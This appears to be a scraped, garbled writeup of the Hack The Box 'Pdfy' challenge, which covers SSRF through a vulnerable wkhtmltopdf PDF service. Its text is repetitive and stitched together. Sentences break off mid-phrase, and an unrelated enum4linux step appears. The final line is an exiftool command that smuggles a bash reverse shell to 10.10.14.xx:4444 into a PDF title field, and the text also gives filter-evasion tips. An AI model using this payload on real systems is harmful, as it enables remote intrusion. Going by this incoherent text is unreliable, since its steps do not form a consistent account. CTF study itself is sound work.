Pdfy Htb Writeup Upd Site

This writeup covers the challenge from Hack The Box , updated as of April 2026. This challenge focuses on exploiting Server-Side Request Forgery (SSRF) via a PDF generation service that uses a vulnerable version of wkhtmltopdf . Challenge Overview

You can use a or, for a more convenient solution for CTF challenges, ngrok . Ngrok creates a secure tunnel to your local machine, exposing a local web server to the public internet.

Use URL encoding or redirects to evade basic string filters. pdfy htb writeup upd

Enumerating the NetBIOS and Microsoft-DS ports using enum4linux reveals a list of users on the system.

The target application is a simple web service that takes a URL and generates a PDF preview of it. Server-Side Request Forgery (SSRF). Primary Tool: wkhtmltopdf (v0.12.5 or older). This writeup covers the challenge from Hack The

The first step in any successful penetration test is thorough reconnaissance. Upon spinning up the challenge instance, you're greeted by a simple but functional web application. Its purpose is clear: it invites you to input a URL of a website, which it then converts into a downloadable PDF file.

Using exiftool :

When the application successfully processes a standard external URL (such as a public web server), look closely at the generated PDF metadata. You can download the PDF and inspect it using command-line utilities like pdfinfo or by checking how the elements are structured.

exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf Ngrok creates a secure tunnel to your local